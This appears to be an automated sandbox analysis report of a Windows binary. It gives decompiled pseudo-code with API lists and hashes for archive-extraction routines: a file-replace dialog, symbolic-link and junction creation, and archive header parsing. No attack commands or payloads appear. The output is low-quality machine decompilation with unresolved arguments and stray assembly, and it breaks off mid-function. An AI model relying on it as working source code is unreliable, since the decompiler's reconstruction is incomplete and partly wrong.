              C-Code - Quality: 58%
              			E00D89A8D(WCHAR* _a4) {
				signed int _t2;

				_t2 = SetCurrentDirectoryW(_a4); // executed
				asm("sbb eax, eax");
				return  ~( ~_t2);
			}




              0x00d89a91
              0x00d89a99
              0x00d89a9d

              APIs
              • SetCurrentDirectoryW.KERNELBASE(?,00D89CE4,C:\Users\user\Desktop,00000000,00DB85FA,00000006), ref: 00D89A91
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CurrentDirectory
              • String ID:
              • API String ID: 1611563598-0
              • Opcode ID: 2d1d5662115d7df54d0676783c74d4528c5722f5a0e0ca1dcb0824218006443f
              • Instruction ID: 61d17d1a9d4c3e222cba44210cc43f26afbe6b7ad7056bccaf3d862fead3f08f
              • Opcode Fuzzy Hash: 2d1d5662115d7df54d0676783c74d4528c5722f5a0e0ca1dcb0824218006443f
              • Instruction Fuzzy Hash: 76A01230194206468A000B34CC09C2576519761702F0086207102C00A0CB308810A510
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Function 00D8AFB9, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 289timewindowfileCOMMON
              Download Yara Rule
              C-Code - Quality: 60%
              			E00D8AFB9(void* __ecx, void* __edx, void* __eflags, char _a4, short _a8, char _a12, short _a108, short _a112, char _a192, char _a212, struct _WIN32_FIND_DATAW _a288, signed char _a304, signed char _a308, struct _FILETIME _a332, intOrPtr _a340, intOrPtr _a344, short _a884, short _a896, short _a900, int _a1904, char _a1924, int _a1928, short _a2596, short _a2616, char _a2628, char _a2640, struct HWND__* _a6740, intOrPtr _a6744, signed short _a6748, intOrPtr _a6752) {
				struct _FILETIME _v0;
				struct _SYSTEMTIME _v12;
				struct _SYSTEMTIME _v16;
				struct _FILETIME _v24;
				void* _t73;
				void* _t136;
				long _t137;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				signed short _t148;
				void* _t151;
				intOrPtr _t152;
				signed int _t153;
				signed int _t157;
				struct HWND__* _t159;
				intOrPtr _t162;
				void* _t163;
				int _t166;
				int _t169;
				void* _t173;
				void* _t177;
				void* _t179;

				_t156 = __edx;
				_t151 = __ecx;
				E00D8D940();
				_t148 = _a6748;
				_t162 = _a6744;
				_t159 = _a6740;
				if(E00D712D7(__edx, _t159, _t162, _t148, _a6752, L"REPLACEFILEDLG", 0, 0) == 0) {
					_t163 = _t162 - 0x110;
					if(_t163 == 0) {
						SetFocus(GetDlgItem(_t159, 0x6c));
						E00D7FAB1( &_a2640, _a6752, 0x800);
						E00D7BA19( &_a2628,  &_a2628, 0x800);
						SetDlgItemTextW(_t159, 0x65,  &_a2616);
						 *0xdadf00( &_a2616, 0,  &_a1924, 0x2b4, 0x100);
						SendDlgItemMessageW(_t159, 0x66, 0x170, _a1904, 0);
						_t173 = FindFirstFileW( &_a2596,  &_a288);
						if(_t173 != 0xffffffff) {
							FileTimeToLocalFileTime( &_a332,  &(_v24.dwHighDateTime));
							FileTimeToSystemTime( &(_v24.dwHighDateTime),  &_v12);
							_push(0x32);
							_push( &_a12);
							_push(0);
							_push( &_v12);
							_t166 = 2;
							GetTimeFormatW(0x400, 0x800, ??, ??, ??, ??);
							GetDateFormatW(0x400, 0,  &_v12, 0,  &_a112, 0x32);
							_push( &_a12);
							_push( &_a112);
							E00D73E41( &_a900, 0x200, L"%s %s %s", E00D7DA42(_t151, 0x99));
							_t179 = _t177 + 0x18;
							SetDlgItemTextW(_t159, 0x6a,  &_a900);
							FindClose(_t173);
							if((_a308 & 0x00000010) == 0) {
								_push(0x32);
								_push( &_a212);
								_push(0);
								_pop(0);
								asm("adc eax, ebp");
								_push(_a340);
								_push(0 + _a344);
								E00D89D99();
								_push(E00D7DA42(0 + _a344, 0x98));
								E00D73E41( &_a884, 0x200, L"%s %s",  &_a192);
								_t179 = _t179 + 0x14;
								SetDlgItemTextW(_t159, 0x68,  &_a884);
							}
							SendDlgItemMessageW(_t159, 0x67, 0x170, _a1928, 0);
							_t152 =  *0xdb75f4; // 0x0
							E00D8082F(_t152, _t156,  &_a4);
							FileTimeToLocalFileTime( &_v0,  &_v24);
							FileTimeToSystemTime( &_v24,  &_v16);
							GetTimeFormatW(0x400, _t166,  &_v16, 0,  &_a8, 0x32);
							GetDateFormatW(0x400, 0,  &_v16, 0,  &_a108, 0x32);
							_push( &_a8);
							_push( &_a108);
							E00D73E41( &_a896, 0x200, L"%s %s %s", E00D7DA42(_t152, 0x99));
							_t177 = _t179 + 0x18;
							SetDlgItemTextW(_t159, 0x6b,  &_a896);
							_t153 =  *0xdcce14;
							_t157 =  *0xdcce10;
							if((_a304 & 0x00000010) == 0 || (_t157 | _t153) != 0) {
								E00D89D99(_t157, _t153,  &_a212, 0x32);
								_push(E00D7DA42(_t153, 0x98));
								E00D73E41( &_a884, 0x200, L"%s %s",  &_a192);
								_t177 = _t177 + 0x14;
								SetDlgItemTextW(_t159, 0x69,  &_a884);
							}
						}
						L27:
						_t73 = 0;
						L28:
						return _t73;
					}
					if(_t163 != 1) {
						goto L27;
					}
					_t169 = 2;
					_t136 = (_t148 & 0x0000ffff) - _t169;
					if(_t136 == 0) {
						L11:
						_push(6);
						L12:
						_pop(_t169);
						L13:
						_t137 = SendDlgItemMessageW(_t159, 0x66, 0x171, 0, 0);
						if(_t137 != 0) {
							 *0xdadf4c(_t137);
						}
						EndDialog(_t159, _t169);
						goto L1;
					}
					_t141 = _t136 - 0x6a;
					if(_t141 == 0) {
						_t169 = 0;
						goto L13;
					}
					_t142 = _t141 - 1;
					if(_t142 == 0) {
						_t169 = 1;
						goto L13;
					}
					_t143 = _t142 - 1;
					if(_t143 == 0) {
						_push(4);
						goto L12;
					}
					_t144 = _t143 - 1;
					if(_t144 == 0) {
						goto L13;
					}
					_t145 = _t144 - 1;
					if(_t145 == 0) {
						_push(3);
						goto L12;
					}
					if(_t145 != 1) {
						goto L27;
					}
					goto L11;
				}
				L1:
				_t73 = 1;
				goto L28;
			}




























              0x00d8afb9
              0x00d8afb9
              0x00d8afbe
              0x00d8afc4
              0x00d8afcd
              0x00d8afd7
              0x00d8aff6
              0x00d8b000
              0x00d8b006
              0x00d8b080
              0x00d8b09b
              0x00d8b0aa
              0x00d8b0c0
              0x00d8b0dd
              0x00d8b0f3
              0x00d8b10f
              0x00d8b114
              0x00d8b127
              0x00d8b137
              0x00d8b13d
              0x00d8b143
              0x00d8b144
              0x00d8b14a
              0x00d8b14d
              0x00d8b154
              0x00d8b172
              0x00d8b17c
              0x00d8b184
              0x00d8b1a2
              0x00d8b1a7
              0x00d8b1b5
              0x00d8b1b8
              0x00d8b1c6
              0x00d8b1c8
              0x00d8b1da
              0x00d8b1e2
              0x00d8b1e4
              0x00d8b1e5
              0x00d8b1e7
              0x00d8b1e8
              0x00d8b1e9
              0x00d8b1f8
              0x00d8b213
              0x00d8b218
              0x00d8b226
              0x00d8b226
              0x00d8b23c
              0x00d8b242
              0x00d8b24d
              0x00d8b25c
              0x00d8b26c
              0x00d8b286
              0x00d8b29e
              0x00d8b2a8
              0x00d8b2b0
              0x00d8b2cf
              0x00d8b2d4
              0x00d8b2e2
              0x00d8b2ec
              0x00d8b2f2
              0x00d8b2f8
              0x00d8b30c
              0x00d8b31b
              0x00d8b332
              0x00d8b337
              0x00d8b345
              0x00d8b345
              0x00d8b2f8
              0x00d8b347
              0x00d8b347
              0x00d8b349
              0x00d8b353
              0x00d8b353
              0x00d8b00b
              0x00000000
              0x00000000
              0x00d8b016
              0x00d8b017
              0x00d8b019
              0x00d8b03d
              0x00d8b03d
              0x00d8b03f
              0x00d8b03f
              0x00d8b040
              0x00d8b04a
              0x00d8b052
              0x00d8b055
              0x00d8b055
              0x00d8b05d
              0x00000000
              0x00d8b05d
              0x00d8b01b
              0x00d8b01e
              0x00d8b072
              0x00000000
              0x00d8b072
              0x00d8b020
              0x00d8b023
              0x00d8b06f
              0x00000000
              0x00d8b06f
              0x00d8b025
              0x00d8b028
              0x00d8b069
              0x00000000
              0x00d8b069
              0x00d8b02a
              0x00d8b02d
              0x00000000
              0x00000000
              0x00d8b02f
              0x00d8b032
              0x00d8b065
              0x00000000
              0x00d8b065
              0x00d8b037
              0x00000000
              0x00000000
              0x00000000
              0x00d8b037
              0x00d8aff8
              0x00d8affa
              0x00000000

              APIs
                • Part of subcall function 00D712D7: GetDlgItem.USER32(00000000,00003021), ref: 00D7131B
                • Part of subcall function 00D712D7: SetWindowTextW.USER32(00000000,00DA22E4), ref: 00D71331
              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00D8B04A
              • EndDialog.USER32(?,00000006), ref: 00D8B05D
              • GetDlgItem.USER32(?,0000006C), ref: 00D8B079
              • SetFocus.USER32(00000000), ref: 00D8B080
              • SetDlgItemTextW.USER32(?,00000065,?), ref: 00D8B0C0
              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00D8B0F3
              • FindFirstFileW.KERNEL32(?,?), ref: 00D8B109
              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D8B127
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D8B137
              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D8B154
              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D8B172
              • _swprintf.LIBCMT ref: 00D8B1A2
                • Part of subcall function 00D73E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D73E54
              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00D8B1B5
              • FindClose.KERNEL32(00000000), ref: 00D8B1B8
              • _swprintf.LIBCMT ref: 00D8B213
              • SetDlgItemTextW.USER32(?,00000068,?), ref: 00D8B226
              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00D8B23C
              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00D8B25C
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D8B26C
              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D8B286
              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D8B29E
              • _swprintf.LIBCMT ref: 00D8B2CF
              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00D8B2E2
              • _swprintf.LIBCMT ref: 00D8B332
              • SetDlgItemTextW.USER32(?,00000069,?), ref: 00D8B345
                • Part of subcall function 00D89D99: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D89DBF
                • Part of subcall function 00D89D99: GetNumberFormatW.KERNEL32 ref: 00D89E0E
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
              • API String ID: 797121971-1840816070
              • Opcode ID: d0a7bae80fd4fd0215dde9ef0b932b1d54baa00ac6523d2adea5fae6698625de
              • Instruction ID: 85f7fd715df8c2d357ccfe600080b1c5ca66db2fc5448f306aec3f99d4fa947b
              • Opcode Fuzzy Hash: d0a7bae80fd4fd0215dde9ef0b932b1d54baa00ac6523d2adea5fae6698625de
              • Instruction Fuzzy Hash: 2F918572148348BFD631EBA4CC49FFB77ACEB4A710F04481AB649D6581E775E6048772
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D76FC6, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 299fileCOMMON
              Download Yara Rule
              C-Code - Quality: 83%
              			E00D76FC6(void* __edx) {
				void* __esi;
				signed int _t111;
				signed int _t113;
				void* _t116;
				int _t118;
				intOrPtr _t121;
				signed int _t139;
				int _t145;
				void* _t182;
				void* _t185;
				void* _t190;
				short _t191;
				void* _t197;
				void* _t202;
				void* _t203;
				void* _t222;
				void* _t223;
				intOrPtr _t224;
				intOrPtr _t226;
				void* _t228;
				WCHAR* _t229;
				intOrPtr _t233;
				short _t237;
				void* _t238;
				intOrPtr _t239;
				short _t241;
				void* _t242;
				void* _t244;
				void* _t245;

				_t223 = __edx;
				E00D8D870(E00DA126D, _t242);
				E00D8D940();
				 *((intOrPtr*)(_t242 - 0x18)) = 1;
				if( *0xdb0043 == 0) {
					E00D77A15(L"SeRestorePrivilege");
					E00D77A15(L"SeCreateSymbolicLinkPrivilege");
					 *0xdb0043 = 1;
				}
				_t199 = _t242 - 0x2c;
				E00D76ED7(_t242 - 0x2c, 0x1418);
				_t197 =  *(_t242 + 0x10);
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				E00D7FAB1(_t242 - 0x107c, _t197 + 0x1104, 0x800);
				 *((intOrPtr*)(_t242 - 0x10)) = E00D92B33(_t242 - 0x107c);
				_t232 = _t242 - 0x107c;
				_t228 = _t242 - 0x207c;
				_t111 = E00D94DA0(_t242 - 0x107c, L"\\??\\", 4);
				_t245 = _t244 + 0x10;
				asm("sbb al, al");
				_t113 =  ~_t111 + 1;
				 *(_t242 - 0x14) = _t113;
				if(_t113 != 0) {
					_t232 = _t242 - 0x1074;
					_t190 = E00D94DA0(_t242 - 0x1074, L"UNC\\", 4);
					_t245 = _t245 + 0xc;
					if(_t190 == 0) {
						_t191 = 0x5c;
						 *((short*)(_t242 - 0x207c)) = _t191;
						_t228 = _t242 - 0x207a;
						_t232 = _t242 - 0x106e;
					}
				}
				E00D94D7E(_t228, _t232);
				_t116 = E00D92B33(_t242 - 0x207c);
				_t233 =  *((intOrPtr*)(_t242 + 8));
				_t229 =  *(_t242 + 0xc);
				 *(_t242 + 0x10) = _t116;
				if( *((char*)(_t233 + 0x618f)) != 0) {
					L9:
					_push(1);
					_push(_t229);
					E00D79D3A(_t199, _t242);
					if( *((char*)(_t197 + 0x10f1)) != 0 ||  *((char*)(_t197 + 0x2104)) != 0) {
						_t118 = CreateDirectoryW(_t229, 0);
						__eflags = _t118;
						if(_t118 == 0) {
							goto L27;
						}
						goto L14;
					} else {
						_t182 = CreateFileW(_t229, 0x40000000, 0, 0, 1, 0x80, 0);
						if(_t182 == 0xffffffff) {
							L27:
							 *((char*)(_t242 - 0x18)) = 0;
							L28:
							E00D7159C(_t242 - 0x2c);
							 *[fs:0x0] =  *((intOrPtr*)(_t242 - 0xc));
							return  *((intOrPtr*)(_t242 - 0x18));
						}
						CloseHandle(_t182);
						L14:
						_t121 =  *((intOrPtr*)(_t197 + 0x1100));
						if(_t121 != 3) {
							__eflags = _t121 - 2;
							if(_t121 == 2) {
								L18:
								_t202 =  *(_t242 - 0x2c);
								_t224 =  *((intOrPtr*)(_t242 - 0x10));
								 *_t202 = 0xa000000c;
								_t237 = _t224 + _t224;
								 *((short*)(_t202 + 0xa)) = _t237;
								 *((short*)(_t202 + 4)) = 0x10 + ( *(_t242 + 0x10) + _t224) * 2;
								 *((intOrPtr*)(_t202 + 6)) = 0;
								E00D94D7E(_t202 + 0x14, _t242 - 0x107c);
								_t60 = _t237 + 2; // 0x3
								_t238 =  *(_t242 - 0x2c);
								 *((short*)(_t238 + 0xc)) = _t60;
								 *((short*)(_t238 + 0xe)) =  *(_t242 + 0x10) +  *(_t242 + 0x10);
								E00D94D7E(_t238 + ( *((intOrPtr*)(_t242 - 0x10)) + 0xb) * 2, _t242 - 0x207c);
								_t139 =  *(_t242 - 0x14) & 0x000000ff ^ 0x00000001;
								__eflags = _t139;
								 *(_t238 + 0x10) = _t139;
								L19:
								_t203 = CreateFileW(_t229, 0xc0000000, 0, 0, 3, 0x2200000, 0);
								 *(_t242 + 0x10) = _t203;
								if(_t203 == 0xffffffff) {
									goto L27;
								}
								_t145 = DeviceIoControl(_t203, 0x900a4, _t238, ( *(_t238 + 4) & 0x0000ffff) + 8, 0, 0, _t242 - 0x30, 0);
								_t262 = _t145;
								if(_t145 != 0) {
									E00D7943C(_t242 - 0x30a0);
									 *(_t242 - 4) = 1;
									 *((intOrPtr*)( *((intOrPtr*)(_t242 - 0x30a0)) + 8))();
									_t239 =  *((intOrPtr*)(_t242 + 8));
									 *(_t242 - 0x309c) =  *(_t242 + 0x10);
									asm("sbb ecx, ecx");
									asm("sbb ecx, ecx");
									asm("sbb ecx, ecx");
									E00D79A7E(_t242 - 0x30a0, _t239,  ~( *(_t239 + 0x72c8)) & _t197 + 0x00001040,  ~( *(_t239 + 0x72cc)) & _t197 + 0x00001048,  ~( *(_t239 + 0x72d0)) & _t197 + 0x00001050);
									E00D794DA(_t242 - 0x30a0);
									__eflags =  *((char*)(_t239 + 0x61a0));
									if( *((char*)(_t239 + 0x61a0)) == 0) {
										E00D7A12F(_t229,  *((intOrPtr*)(_t197 + 0x24)));
									}
									E00D7946E(_t242 - 0x30a0);
									goto L28;
								}
								CloseHandle( *(_t242 + 0x10));
								E00D76BF5(_t262, 0x15, 0, _t229);
								_t160 = GetLastError();
								if(_t160 == 5 || _t160 == 0x522) {
									if(E00D7FC98() == 0) {
										E00D71567(_t242 - 0x7c, 0x18);
										_t160 = E00D80A9F(_t242 - 0x7c);
									}
								}
								E00D8E214(_t160);
								E00D76E03(0xdb00e0, 9);
								_push(_t229);
								if( *((char*)(_t197 + 0x10f1)) == 0) {
									DeleteFileW();
								} else {
									RemoveDirectoryW();
								}
								goto L27;
							}
							__eflags = _t121 - 1;
							if(_t121 != 1) {
								goto L27;
							}
							goto L18;
						}
						_t222 =  *(_t242 - 0x2c);
						_t226 =  *((intOrPtr*)(_t242 - 0x10));
						 *_t222 = 0xa0000003;
						_t241 = _t226 + _t226;
						 *((short*)(_t222 + 0xa)) = _t241;
						 *((short*)(_t222 + 4)) = 0xc + ( *(_t242 + 0x10) + _t226) * 2;
						 *((intOrPtr*)(_t222 + 6)) = 0;
						E00D94D7E(_t222 + 0x10, _t242 - 0x107c);
						_t40 = _t241 + 2; // 0x3
						_t238 =  *(_t242 - 0x2c);
						 *((short*)(_t238 + 0xc)) = _t40;
						 *((short*)(_t238 + 0xe)) =  *(_t242 + 0x10) +  *(_t242 + 0x10);
						E00D94D7E(_t238 + ( *((intOrPtr*)(_t242 - 0x10)) + 9) * 2, _t242 - 0x207c);
						goto L19;
					}
				}
				if( *(_t242 - 0x14) != 0) {
					goto L27;
				}
				_t185 = E00D7B4F2(_t197 + 0x1104);
				_t255 = _t185;
				if(_t185 != 0) {
					goto L27;
				}
				_push(_t197 + 0x1104);
				_push(_t229);
				_push(_t197 + 0x28);
				_push(_t233);
				if(E00D777F7(_t223, _t255) == 0) {
					goto L27;
				}
				goto L9;
			}
































              0x00d76fc6
              0x00d76fcb
              0x00d76fd5
              0x00d76fe7
              0x00d76fea
              0x00d76ff1
              0x00d76ffb
              0x00d77000
              0x00d77000
              0x00d7700b
              0x00d7700e
              0x00d77013
              0x00d77016
              0x00d7702d
              0x00d77040
              0x00d77043
              0x00d7704b
              0x00d77057
              0x00d7705c
              0x00d77061
              0x00d77063
              0x00d77065
              0x00d7706a
              0x00d7706e
              0x00d7707c
              0x00d77081
              0x00d77086
              0x00d7708a
              0x00d7708b
              0x00d77092
              0x00d77098
              0x00d77098
              0x00d77086
              0x00d770a0
              0x00d770ac
              0x00d770b1
              0x00d770b7
              0x00d770ba
              0x00d770c4
              0x00d770fe
              0x00d77101
              0x00d77102
              0x00d77103
              0x00d7710f
              0x00d77146
              0x00d7714c
              0x00d7714e
              0x00000000
              0x00000000
              0x00000000
              0x00d7711a
              0x00d7712b
              0x00d77134
              0x00d772f4
              0x00d772f4
              0x00d772f8
              0x00d772fb
              0x00d77309
              0x00d77313
              0x00d77313
              0x00d7713b
              0x00d77154
              0x00d77154
              0x00d7715d
              0x00d771c5
              0x00d771c8
              0x00d771d2
              0x00d771d2
              0x00d771d5
              0x00d771dd
              0x00d771e3
              0x00d771e6
              0x00d771f1
              0x00d771f7
              0x00d77205
              0x00d7720a
              0x00d7720d
              0x00d77210
              0x00d77219
              0x00d7722e
              0x00d7723c
              0x00d7723c
              0x00d7723f
              0x00d77242
              0x00d7725a
              0x00d7725c
              0x00d77262
              0x00000000
              0x00000000
              0x00d77280
              0x00d77286
              0x00d77288
              0x00d77324
              0x00d77335
              0x00d77339
              0x00d7733c
              0x00d77342
              0x00d77356
              0x00d77369
              0x00d7737c
              0x00d77387
              0x00d77392
              0x00d77397
              0x00d7739e
              0x00d773a4
              0x00d773a4
              0x00d773af
              0x00000000
              0x00d773af
              0x00d77292
              0x00d7729d
              0x00d772a2
              0x00d772ab
              0x00d772bb
              0x00d772c2
              0x00d772ca
              0x00d772ca
              0x00d772bb
              0x00d772d6
              0x00d772df
              0x00d772eb
              0x00d772ec
              0x00d77316
              0x00d772ee
              0x00d772ee
              0x00d772ee
              0x00000000
              0x00d772ec
              0x00d771ca
              0x00d771cc
              0x00000000
              0x00000000
              0x00000000
              0x00d771cc
              0x00d7715f
              0x00d77162
              0x00d7716a
              0x00d77170
              0x00d77173
              0x00d7717e
              0x00d77184
              0x00d77192
              0x00d77197
              0x00d7719a
              0x00d7719d
              0x00d771a6
              0x00d771bb
              0x00000000
              0x00d771c0
              0x00d7710f
              0x00d770ca
              0x00000000
              0x00000000
              0x00d770d7
              0x00d770dc
              0x00d770de
              0x00000000
              0x00000000
              0x00d770ea
              0x00d770eb
              0x00d770ef
              0x00d770f0
              0x00d770f8
              0x00000000
              0x00000000
              0x00000000

              APIs
              • __EH_prolog.LIBCMT ref: 00D76FCB
              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00D7712B
              • CloseHandle.KERNEL32(00000000), ref: 00D7713B
                • Part of subcall function 00D77A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D77A24
                • Part of subcall function 00D77A15: GetLastError.KERNEL32 ref: 00D77A6A
                • Part of subcall function 00D77A15: CloseHandle.KERNEL32(?), ref: 00D77A79
              • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00D77146
              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00D77254
              • DeviceIoControl.KERNEL32 ref: 00D77280
              • CloseHandle.KERNEL32(?), ref: 00D77292
              • GetLastError.KERNEL32(00000015,00000000,?), ref: 00D772A2
              • RemoveDirectoryW.KERNEL32(?), ref: 00D772EE
              • DeleteFileW.KERNEL32(?), ref: 00D77316
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
              • API String ID: 3935142422-3508440684
              • Opcode ID: ffdb6cf29392b6e4e254b724244a96ee20e578b5f4a15b738765c973751ec814
              • Instruction ID: 582fe1ef360b7beb94ecd7c17f4a2ea2eb56039a7fce9ffb3b136c0c9a85231c
              • Opcode Fuzzy Hash: ffdb6cf29392b6e4e254b724244a96ee20e578b5f4a15b738765c973751ec814
              • Instruction Fuzzy Hash: 98B19F719042189BEF21DF64CC45BEE77B8EF09304F0489A9F919E7282E770AA45CB75
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D730FC, Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 605COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 84%
              			E00D730FC(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				signed int _t242;
				void* _t248;
				unsigned int _t250;
				signed int _t254;
				signed int _t255;
				unsigned int _t256;
				void* _t257;
				char _t270;
				signed int _t289;
				unsigned int _t290;
				intOrPtr _t291;
				signed int _t292;
				signed int _t295;
				char _t302;
				signed char _t304;
				signed int _t320;
				signed int _t331;
				signed int _t335;
				signed int _t350;
				signed char _t352;
				unsigned int _t362;
				void* _t378;
				void* _t380;
				void* _t381;
				void* _t392;
				intOrPtr* _t394;
				intOrPtr* _t396;
				signed int _t409;
				signed int _t419;
				char _t431;
				signed int _t432;
				signed int _t437;
				signed int _t441;
				intOrPtr _t449;
				unsigned int _t455;
				unsigned int _t458;
				signed int _t462;
				signed int _t470;
				signed int _t479;
				signed int _t484;
				signed int _t498;
				intOrPtr _t499;
				signed int _t500;
				signed char _t501;
				unsigned int _t502;
				void* _t509;
				void* _t517;
				signed int _t520;
				void* _t521;
				signed int _t531;
				unsigned int _t534;
				void* _t539;
				intOrPtr _t543;
				void* _t544;
				void* _t545;
				void* _t546;
				intOrPtr _t556;

				_t396 = __ecx;
				_t546 = _t545 - 0x68;
				E00D8D870(E00DA11A9, _t544);
				E00D8D940();
				_t394 = _t396;
				E00D7C223(_t544 + 0x30, _t394);
				 *(_t544 + 0x60) = 0;
				 *((intOrPtr*)(_t544 - 4)) = 0;
				if( *((intOrPtr*)(_t394 + 0x6cbc)) == 0) {
					L15:
					 *((char*)(_t544 + 0x6a)) = 0;
					L16:
					if(E00D7C42E(_t498, 7) >= 7) {
						 *(_t394 + 0x21f4) = 0;
						_t509 = _t394 + 0x21e4;
						 *_t509 = E00D7C29E(_t544 + 0x30);
						_t531 = E00D7C40A(_t544 + 0x30, 4);
						_t242 = E00D7C39E(_t498);
						__eflags = _t242 | _t498;
						if((_t242 | _t498) == 0) {
							L85:
							E00D71EF8(_t394);
							L86:
							E00D7159C(_t544 + 0x30);
							 *[fs:0x0] =  *((intOrPtr*)(_t544 - 0xc));
							return  *(_t544 + 0x60);
						}
						__eflags = _t531;
						if(_t531 == 0) {
							goto L85;
						}
						_t42 = _t531 - 3; // -3
						_t534 = _t531 + 4 + _t242;
						_t409 = _t42 + _t242;
						__eflags = _t409;
						 *(_t544 + 0x64) = _t534;
						if(_t409 < 0) {
							goto L85;
						}
						__eflags = _t534 - 7;
						if(_t534 < 7) {
							goto L85;
						}
						E00D7C42E(_t498, _t409);
						__eflags =  *(_t544 + 0x48) - _t534;
						if( *(_t544 + 0x48) < _t534) {
							goto L17;
						}
						_t248 = E00D7C37E(_t544 + 0x30);
						 *(_t394 + 0x21e8) = E00D7C39E(_t498);
						_t250 = E00D7C39E(_t498);
						 *(_t394 + 0x21ec) = _t250;
						__eflags =  *_t509 - _t248;
						 *(_t394 + 0x21f4) = _t250 >> 0x00000002 & 0x00000001;
						 *(_t394 + 0x21f0) =  *(_t544 + 0x64);
						_t254 =  *(_t394 + 0x21e8);
						 *(_t394 + 0x21dc) = _t254;
						_t255 = _t254 & 0xffffff00 |  *_t509 != _t248;
						 *(_t544 + 0x6b) = _t255;
						__eflags = _t255;
						if(_t255 == 0) {
							L26:
							_t256 = 0;
							__eflags =  *(_t394 + 0x21ec) & 0x00000001;
							 *(_t544 + 0x58) = 0;
							 *(_t544 + 0x54) = 0;
							if(( *(_t394 + 0x21ec) & 0x00000001) == 0) {
								L30:
								__eflags =  *(_t394 + 0x21ec) & 0x00000002;
								_t536 = _t256;
								 *(_t544 + 0x64) = _t256;
								 *(_t544 + 0x5c) = _t256;
								if(( *(_t394 + 0x21ec) & 0x00000002) != 0) {
									_t362 = E00D7C39E(_t498);
									_t536 = _t362;
									 *(_t544 + 0x64) = _t362;
									 *(_t544 + 0x5c) = _t498;
								}
								_t257 = E00D71901(_t394,  *(_t394 + 0x21f0));
								_t499 = 0;
								asm("adc eax, edx");
								 *((intOrPtr*)(_t394 + 0x6ca8)) = E00D73CA7( *((intOrPtr*)(_t394 + 0x6ca0)) + _t257,  *((intOrPtr*)(_t394 + 0x6ca4)), _t536,  *(_t544 + 0x5c), _t499, _t499);
								 *((intOrPtr*)(_t394 + 0x6cac)) = _t499;
								_t500 =  *(_t394 + 0x21e8);
								__eflags = _t500 - 1;
								if(__eflags == 0) {
									E00D7A96C(_t394 + 0x2208);
									_t419 = 5;
									memcpy(_t394 + 0x2208, _t509, _t419 << 2);
									_t501 = E00D7C39E(_t500);
									 *(_t394 + 0x6cb5) = _t501 & 1;
									 *(_t394 + 0x6cb4) = _t501 >> 0x00000002 & 1;
